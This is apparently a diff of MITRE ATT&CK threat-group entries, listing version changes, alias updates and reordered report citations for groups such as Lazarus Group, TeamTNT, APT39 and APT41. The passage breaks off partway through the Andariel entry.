external_references[3]['source_name']Volexity Exchange Marauder March 2021Microsoft HAFNIUM March 2020
external_references[3]['description']Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021.MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021.
external_references[3]['url']https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
x_mitre_version1.01.2

[G0032] Lazarus Group

Current version: 3.1

Version changed from: 2.0 → 3.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Kyaw Pyiyt Htet, @KyawPyiytHtet', 'Dragos Threat Intelligence']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 22:04:58.182000+00:002022-08-23 15:30:44.196000+00:00
external_references[1]['source_name']Lazarus GroupLabyrinth Chollima
external_references[1]['description'](Citation: Novetta Blockbuster)(Citation: CrowdStrike Labyrinth Chollima Feb 2022)
external_references[2]['source_name']HIDDEN COBRAZINC
external_references[2]['description']The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: US-CERT HOPLIGHT Apr 2019)(Citation: Microsoft ZINC disruption Dec 2017)
external_references[3]['source_name']Guardians of PeaceLazarus Group
external_references[3]['description'](Citation: US-CERT HIDDEN COBRA June 2017)(Citation: Novetta Blockbuster)
external_references[4]['source_name']ZINCNICKEL ACADEMY
external_references[4]['description'](Citation: Microsoft ZINC disruption Dec 2017)(Citation: Secureworks NICKEL ACADEMY Dec 2017)
external_references[5]['source_name']NICKEL ACADEMYGuardians of Peace
external_references[5]['description'](Citation: Secureworks NICKEL ACADEMY Dec 2017)(Citation: US-CERT HIDDEN COBRA June 2017)
external_references[6]['source_name']US-CERT HIDDEN COBRA June 2017CrowdStrike Labyrinth Chollima Feb 2022
external_references[6]['description']US-CERT. (2017, June 13). Alert (TA17-164A) HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure. Retrieved July 13, 2017.CrowdStrike. (2022, February 1). CrowdStrike Adversary Labyrinth Chollima. Retrieved February 1, 2022.
external_references[6]['url']https://www.us-cert.gov/ncas/alerts/TA17-164Ahttps://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/
external_references[7]['source_name']Treasury North Korean Cyber Groups September 2019Novetta Blockbuster
external_references[7]['description']US Treasury . (2019, September 13). Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups. Retrieved September 29, 2021.Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.
external_references[7]['url']https://home.treasury.gov/news/press-releases/sm774https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
external_references[8]['source_name']Novetta BlockbusterSecureworks NICKEL ACADEMY Dec 2017
external_references[8]['description']Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.Secureworks. (2017, December 15). Media Alert - Secureworks Discovers North Korean Cyber Threat Group, Lazarus, Spearphishing Financial Executives of Cryptocurrency Companies. Retrieved December 27, 2017.
external_references[8]['url']https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdfhttps://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing
external_references[9]['source_name']US-CERT HOPLIGHT Apr 2019Microsoft ZINC disruption Dec 2017
external_references[9]['description']US-CERT. (2019, April 10). MAR-10135536-8 – North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019.Smith, B. (2017, December 19). Microsoft and Facebook disrupt ZINC malware attack to protect customers and the internet from ongoing cyberthreats. Retrieved December 20, 2017.
external_references[9]['url']https://www.us-cert.gov/ncas/analysis-reports/AR19-100Ahttps://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/
external_references[10]['source_name']Microsoft ZINC disruption Dec 2017HIDDEN COBRA
external_references[10]['description']Smith, B. (2017, December 19). Microsoft and Facebook disrupt ZINC malware attack to protect customers and the internet from ongoing cyberthreats. Retrieved December 20, 2017.The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: US-CERT HOPLIGHT Apr 2019)
external_references[11]['source_name']Secureworks NICKEL ACADEMY Dec 2017Treasury North Korean Cyber Groups September 2019
external_references[11]['description']Secureworks. (2017, December 15). Media Alert - Secureworks Discovers North Korean Cyber Threat Group, Lazarus, Spearphishing Financial Executives of Cryptocurrency Companies. Retrieved December 27, 2017.US Treasury . (2019, September 13). Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups. Retrieved September 29, 2021.
external_references[11]['url']https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishinghttps://home.treasury.gov/news/press-releases/sm774
x_mitre_version2.03.1
iterable_item_added
STIX FieldOld valueNew Value
aliasesLabyrinth Chollima
external_references{'source_name': 'US-CERT HIDDEN COBRA June 2017', 'description': 'US-CERT. (2017, June 13). Alert (TA17-164A) HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure. Retrieved July 13, 2017.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA17-164A'}
external_references{'source_name': 'US-CERT HOPLIGHT Apr 2019', 'description': 'US-CERT. (2019, April 10). MAR-10135536-8 – North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019.', 'url': 'https://www.us-cert.gov/ncas/analysis-reports/AR19-100A'}

[G0139] TeamTNT

Current version: 1.2

Version changed from: 1.0 → 1.2


Old Description
New Description
t1[TeamTNT](https://attack.mitre.org/groups/G0139) is a threatt1[TeamTNT](https://attack.mitre.org/groups/G0139) is a threat
> group that has primarily targeted cloud and containerized e> group that has primarily targeted cloud and containerized e
>nvironments. The group as been active since at least October>nvironments. The group as been active since at least October
> 2019 and has mainly focused its efforts on leveraging cloud> 2019 and has mainly focused its efforts on leveraging cloud
> and container resources to deploy cryptocurrency miners in > and container resources to deploy cryptocurrency miners in 
>victim environments. (Citation: Palo Alto Black-T October 20>victim environments.(Citation: Palo Alto Black-T October 202
>20)(Citation: Lacework TeamTNT May 2021)(Citation: Intezer T>0)(Citation: Lacework TeamTNT May 2021)(Citation: Intezer Te
>eamTNT September 2020)(Citation: Cado Security TeamTNT Worm >amTNT September 2020)(Citation: Cado Security TeamTNT Worm A
>August 2020)(Citation: Unit 42 Hildegard Malware)(Citation: >ugust 2020)(Citation: Unit 42 Hildegard Malware)(Citation: T
>Trend Micro TeamTNT)(Citation: ATT TeamTNT Chimaera Septembe>rend Micro TeamTNT)(Citation: ATT TeamTNT Chimaera September
>r 2020)(Citation: Aqua TeamTNT August 2020)(Citation: Inteze> 2020)(Citation: Aqua TeamTNT August 2020)(Citation: Intezer
>r TeamTNT Explosion September 2021)> TeamTNT Explosion September 2021)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 18:47:18.824000+00:002022-10-19 21:35:03.147000+00:00
description[TeamTNT](https://attack.mitre.org/groups/G0139) is a threat group that has primarily targeted cloud and containerized environments. The group as been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments. (Citation: Palo Alto Black-T October 2020)(Citation: Lacework TeamTNT May 2021)(Citation: Intezer TeamTNT September 2020)(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro TeamTNT)(Citation: ATT TeamTNT Chimaera September 2020)(Citation: Aqua TeamTNT August 2020)(Citation: Intezer TeamTNT Explosion September 2021)[TeamTNT](https://attack.mitre.org/groups/G0139) is a threat group that has primarily targeted cloud and containerized environments. The group as been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments.(Citation: Palo Alto Black-T October 2020)(Citation: Lacework TeamTNT May 2021)(Citation: Intezer TeamTNT September 2020)(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro TeamTNT)(Citation: ATT TeamTNT Chimaera September 2020)(Citation: Aqua TeamTNT August 2020)(Citation: Intezer TeamTNT Explosion September 2021)
external_references[1]['source_name']Palo Alto Black-T October 2020ATT TeamTNT Chimaera September 2020
external_references[1]['description']Quist, N. (2020, October 5). Black-T: New Cryptojacking Variant from TeamTNT. Retrieved September 22, 2021.AT&T Alien Labs. (2021, September 8). TeamTNT with new campaign aka Chimaera. Retrieved September 22, 2021.
external_references[1]['url']https://unit42.paloaltonetworks.com/black-t-cryptojacking-variant/https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera
external_references[2]['source_name']Lacework TeamTNT May 2021Cado Security TeamTNT Worm August 2020
external_references[2]['description']Stroud, J. (2021, May 25). Taking TeamTNT's Docker Images Offline. Retrieved September 22, 2021.Cado Security. (2020, August 16). Team TNT – The First Crypto-Mining Worm to Steal AWS Credentials. Retrieved September 22, 2021.
external_references[2]['url']https://www.lacework.com/blog/taking-teamtnt-docker-images-offline/https://www.cadosecurity.com/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials/
external_references[3]['source_name']Intezer TeamTNT September 2020Unit 42 Hildegard Malware
external_references[3]['description']Fishbein, N. (2020, September 8). Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks. Retrieved September 22, 2021.Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.
external_references[3]['url']https://www.intezer.com/blog/cloud-security/attackers-abusing-legitimate-cloud-monitoring-tools-to-conduct-cyber-attacks/https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
external_references[4]['source_name']Cado Security TeamTNT Worm August 2020Trend Micro TeamTNT
external_references[4]['description']Cado Security. (2020, August 16). Team TNT – The First Crypto-Mining Worm to Steal AWS Credentials. Retrieved September 22, 2021.Fiser, D. Oliveira, A. (n.d.). Tracking the Activities of TeamTNT A Closer Look at a Cloud-Focused Malicious Actor Group. Retrieved September 22, 2021.
external_references[4]['url']https://www.cadosecurity.com/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials/https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf
external_references[5]['source_name']Unit 42 Hildegard MalwareIntezer TeamTNT September 2020
external_references[5]['description']Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.Fishbein, N. (2020, September 8). Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks. Retrieved September 22, 2021.
external_references[5]['url']https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/https://www.intezer.com/blog/cloud-security/attackers-abusing-legitimate-cloud-monitoring-tools-to-conduct-cyber-attacks/
external_references[6]['source_name']Trend Micro TeamTNTIntezer TeamTNT Explosion September 2021
external_references[6]['description']Fiser, D. Oliveira, A. (n.d.). Tracking the Activities of TeamTNT A Closer Look at a Cloud-Focused Malicious Actor Group. Retrieved September 22, 2021.Intezer. (2021, September 1). TeamTNT Cryptomining Explosion. Retrieved October 15, 2021.
external_references[6]['url']https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdfhttps://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf
external_references[7]['source_name']ATT TeamTNT Chimaera September 2020Aqua TeamTNT August 2020
external_references[7]['description']AT&T Alien Labs. (2021, September 8). TeamTNT with new campaign aka Chimaera. Retrieved September 22, 2021.Kol, Roi. Morag, A. (2020, August 25). Deep Analysis of TeamTNT Techniques Using Container Images to Attack. Retrieved September 22, 2021.
external_references[7]['url']https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaerahttps://blog.aquasec.com/container-security-tnt-container-attack
external_references[8]['source_name']Aqua TeamTNT August 2020Palo Alto Black-T October 2020
external_references[8]['description']Kol, Roi. Morag, A. (2020, August 25). Deep Analysis of TeamTNT Techniques Using Container Images to Attack. Retrieved September 22, 2021.Quist, N. (2020, October 5). Black-T: New Cryptojacking Variant from TeamTNT. Retrieved September 22, 2021.
external_references[8]['url']https://blog.aquasec.com/container-security-tnt-container-attackhttps://unit42.paloaltonetworks.com/black-t-cryptojacking-variant/
external_references[9]['source_name']Intezer TeamTNT Explosion September 2021Lacework TeamTNT May 2021
external_references[9]['description']Intezer. (2021, September 1). TeamTNT Cryptomining Explosion. Retrieved October 15, 2021.Stroud, J. (2021, May 25). Taking TeamTNT's Docker Images Offline. Retrieved September 22, 2021.
external_references[9]['url']https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdfhttps://www.lacework.com/blog/taking-teamtnt-docker-images-offline/
x_mitre_version1.01.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsDarin Smith, Cisco
Metadata-only Changes

[G0023] APT16

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-10-12 19:54:58.537000+00:002022-07-26 23:33:26.354000+00:00
external_references[2]['description']Winters, R.. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.Winters, R. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.
external_references[2]['url']https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.htmlhttps://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html

[G0064] APT33

Current version: 1.4

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Dragos Threat Intelligence']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-05-26 12:40:42.907000+00:002022-05-23 21:22:08.170000+00:00
external_references[4]['source_name']FireEye APT33 Sept 2017FireEye APT33 Webinar Sept 2017
external_references[4]['description']O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018.
external_references[4]['url']https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.htmlhttps://www.brighttalk.com/webcast/10703/275683
external_references[5]['source_name']FireEye APT33 Webinar Sept 2017Microsoft Holmium June 2020
external_references[5]['description']Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018.Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020.
external_references[5]['url']https://www.brighttalk.com/webcast/10703/275683https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/
external_references[6]['source_name']Microsoft Holmium June 2020FireEye APT33 Sept 2017
external_references[6]['description']Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020.O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.
external_references[6]['url']https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html

[G0082] APT38

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 16:33:27.982000+00:002022-01-18 17:13:14.610000+00:00

[G0087] APT39

Current version: 3.1


Old Description
New Description
t1[APT39](https://attack.mitre.org/groups/G0087) is one of sevt1[APT39](https://attack.mitre.org/groups/G0087) is one of sev
>eral names for cyberespionage activity conducted by the Iran>eral names for cyber espionage activity conducted by the Ira
>ian Ministry of Intelligence and Security (MOIS) through the>nian Ministry of Intelligence and Security (MOIS) through th
> front company Rana Intelligence Computing since at least 20>e front company Rana Intelligence Computing since at least 2
>14. [APT39](https://attack.mitre.org/groups/G0087) has prima>014. [APT39](https://attack.mitre.org/groups/G0087) has prim
>rily targeted the travel, hospitality, academic, and telecom>arily targeted the travel, hospitality, academic, and teleco
>munications industries in Iran and across Asia, Africa, Euro>mmunications industries in Iran and across Asia, Africa, Eur
>pe, and North America to track individuals and entities cons>ope, and North America to track individuals and entities con
>idered to be a threat by the MOIS.(Citation: FireEye APT39 J>sidered to be a threat by the MOIS.(Citation: FireEye APT39 
>an 2019)(Citation: Symantec Chafer Dec 2015)(Citation: FBI F>Jan 2019)(Citation: Symantec Chafer Dec 2015)(Citation: FBI 
>LASH APT39 September 2020)(Citation: Dept. of Treasury Iran >FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran
>Sanctions September 2020)(Citation: DOJ Iran Indictments Sep> Sanctions September 2020)(Citation: DOJ Iran Indictments Se
>tember 2020)>ptember 2020)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-12 23:08:30.844000+00:002022-09-02 18:03:29.024000+00:00
description[APT39](https://attack.mitre.org/groups/G0087) is one of several names for cyberespionage activity conducted by the Iranian Ministry of Intelligence and Security (MOIS) through the front company Rana Intelligence Computing since at least 2014. [APT39](https://attack.mitre.org/groups/G0087) has primarily targeted the travel, hospitality, academic, and telecommunications industries in Iran and across Asia, Africa, Europe, and North America to track individuals and entities considered to be a threat by the MOIS.(Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020)[APT39](https://attack.mitre.org/groups/G0087) is one of several names for cyber espionage activity conducted by the Iranian Ministry of Intelligence and Security (MOIS) through the front company Rana Intelligence Computing since at least 2014. [APT39](https://attack.mitre.org/groups/G0087) has primarily targeted the travel, hospitality, academic, and telecommunications industries in Iran and across Asia, Africa, Europe, and North America to track individuals and entities considered to be a threat by the MOIS.(Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020)
external_references[1]['source_name']APT39Remix Kitten
external_references[1]['description'](Citation: FireEye APT39 Jan 2019)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020)(Citation: Crowdstrike GTR2020 Mar 2020)
external_references[2]['source_name']REMIX KITTENITG07
external_references[2]['description'](Citation: Crowdstrike GTR2020 Mar 2020)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020)
external_references[3]['source_name']ITG07APT39
external_references[3]['description'](Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020)(Citation: FireEye APT39 Jan 2019)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020)
external_references[5]['source_name']FireEye APT39 Jan 2019Crowdstrike GTR2020 Mar 2020
external_references[5]['description']Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019.Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.
external_references[5]['url']https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.htmlhttps://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
external_references[6]['source_name']Symantec Chafer Dec 2015Dept. of Treasury Iran Sanctions September 2020
external_references[6]['description']Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.Dept. of Treasury. (2020, September 17). Treasury Sanctions Cyber Actors Backed by Iranian Intelligence. Retrieved December 10, 2020.
external_references[6]['url']https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targetshttps://home.treasury.gov/news/press-releases/sm1127
external_references[7]['source_name']FBI FLASH APT39 September 2020DOJ Iran Indictments September 2020
external_references[7]['description']FBI. (2020, September 17). Indicators of Compromise Associated with Rana Intelligence Computing, also known as Advanced Persistent Threat 39, Chafer, Cadelspy, Remexi, and ITG07. Retrieved December 10, 2020.DOJ. (2020, September 17). Department of Justice and Partner Departments and Agencies Conduct Coordinated Actions to Disrupt and Deter Iranian Malicious Cyber Activities Targeting the United States and the Broader International Community. Retrieved December 10, 2020.
external_references[7]['url']https://www.iranwatch.org/sites/default/files/public-intelligence-alert.pdfhttps://www.justice.gov/opa/pr/department-justice-and-partner-departments-and-agencies-conduct-coordinated-actions-disrupt
external_references[8]['source_name']Dept. of Treasury Iran Sanctions September 2020FBI FLASH APT39 September 2020
external_references[8]['description']Dept. of Treasury. (2020, September 17). Treasury Sanctions Cyber Actors Backed by Iranian Intelligence. Retrieved December 10, 2020.FBI. (2020, September 17). Indicators of Compromise Associated with Rana Intelligence Computing, also known as Advanced Persistent Threat 39, Chafer, Cadelspy, Remexi, and ITG07. Retrieved December 10, 2020.
external_references[8]['url']https://home.treasury.gov/news/press-releases/sm1127https://www.iranwatch.org/sites/default/files/public-intelligence-alert.pdf
external_references[9]['source_name']DOJ Iran Indictments September 2020FireEye APT39 Jan 2019
external_references[9]['description']DOJ. (2020, September 17). Department of Justice and Partner Departments and Agencies Conduct Coordinated Actions to Disrupt and Deter Iranian Malicious Cyber Activities Targeting the United States and the Broader International Community. Retrieved December 10, 2020.Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019.
external_references[9]['url']https://www.justice.gov/opa/pr/department-justice-and-partner-departments-and-agencies-conduct-coordinated-actions-disrupthttps://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html
external_references[10]['source_name']Crowdstrike GTR2020 Mar 2020Dark Reading APT39 JAN 2019
external_references[10]['description']Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.Higgins, K. (2019, January 30). Iran Ups its Traditional Cyber Espionage Tradecraft. Retrieved May 22, 2020.
external_references[10]['url']https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdfhttps://www.darkreading.com/attacks-breaches/iran-ups-its-traditional-cyber-espionage-tradecraft/d/d-id/1333764
external_references[11]['source_name']Dark Reading APT39 JAN 2019Symantec Chafer Dec 2015
external_references[11]['description']Higgins, K. (2019, January 30). Iran Ups its Traditional Cyber Espionage Tradecraft. Retrieved May 22, 2020.Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.
external_references[11]['url']https://www.darkreading.com/attacks-breaches/iran-ups-its-traditional-cyber-espionage-tradecraft/d/d-id/1333764https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets
iterable_item_added
STIX FieldOld valueNew Value
aliasesRemix Kitten
iterable_item_removed
STIX FieldOld valueNew Value
aliasesREMIX KITTEN

[G0096] APT41

Current version: 3.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 00:28:08.413000+00:002022-06-02 20:09:29.475000+00:00
aliases[1]WICKED PANDAWicked Panda
external_references[1]['source_name']APT41Wicked Panda
external_references[1]['description'](Citation: FireEye APT41 2019)(Citation: Crowdstrike GTR2020 Mar 2020)
external_references[2]['source_name']WICKED PANDAAPT41
external_references[2]['description'](Citation: Crowdstrike GTR2020 Mar 2020)(Citation: FireEye APT41 2019)
external_references[3]['source_name']FireEye APT41 Aug 2019Crowdstrike GTR2020 Mar 2020
external_references[3]['description']Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.
external_references[3]['url']https://content.fireeye.com/apt-41/rpt-apt41https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
external_references[4]['source_name']Group IB APT 41 June 2021FireEye APT41 2019
external_references[4]['description']Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.
external_references[4]['url']https://blog.group-ib.com/colunmtk_apt41https://content.fireeye.com/apt-41/rpt-apt41
external_references[5]['source_name']Crowdstrike GTR2020 Mar 2020FireEye APT41 Aug 2019
external_references[5]['description']Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.
external_references[5]['url']https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdfhttps://content.fireeye.com/apt-41/rpt-apt41
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://blog.group-ib.com/colunmtk_apt41'}

[G0130] Ajax Security Team

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-22 20:13:14.377000+00:002021-12-17 19:27:27.246000+00:00
external_references[1]['description']Analysis of infrastructure, tools, and modes of operation revealed a potential relationship between Ajax Security Team and the campaign Operation Woolen-Goldfish.(Citation: Check Point Rocket Kitten)(Citation: TrendMicro Operation Woolen Goldfish March 2015)Analysis of infrastructure, tools, and modes of operation revealed a potential relationship between [Ajax Security Team](https://attack.mitre.org/groups/G0130) and the campaign Operation Woolen-Goldfish.(Citation: Check Point Rocket Kitten)(Citation: TrendMicro Operation Woolen Goldfish March 2015)
external_references[3]['description']Analysis of infrastructure, tools, and modes of operation revealed a potential relationship between Ajax Security Team and Rocket Kitten.(Citation: Check Point Rocket Kitten)(Citation: IranThreats Kittens Dec 2017)Analysis of infrastructure, tools, and modes of operation revealed a potential relationship between [Ajax Security Team](https://attack.mitre.org/groups/G0130) and Rocket Kitten.(Citation: Check Point Rocket Kitten)(Citation: IranThreats Kittens Dec 2017)

[G0138] Andariel

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 15:16:47.329000+00:002022-05-24 16:27:11.471000+00:00
external_references[1]['source_name']AndarielSilent Chollima
external_references[1]['description'](Citation: FSI Andariel Campaign Rifle July 2017)(Citation: CrowdStrike Silent Chollima Adversary September 2021)
external_references[2]['source_name']Silent ChollimaAndariel
external_references[2]['description'](Citation: CrowdStrike Silent Chollima Adversary September 2021)(Citation: FSI Andariel Campaign Rifle July 2017)
external_references[3]['source_name']FSI Andariel Campaign Rifle July 2017AhnLab Andariel Subgroup of Lazarus June 2018
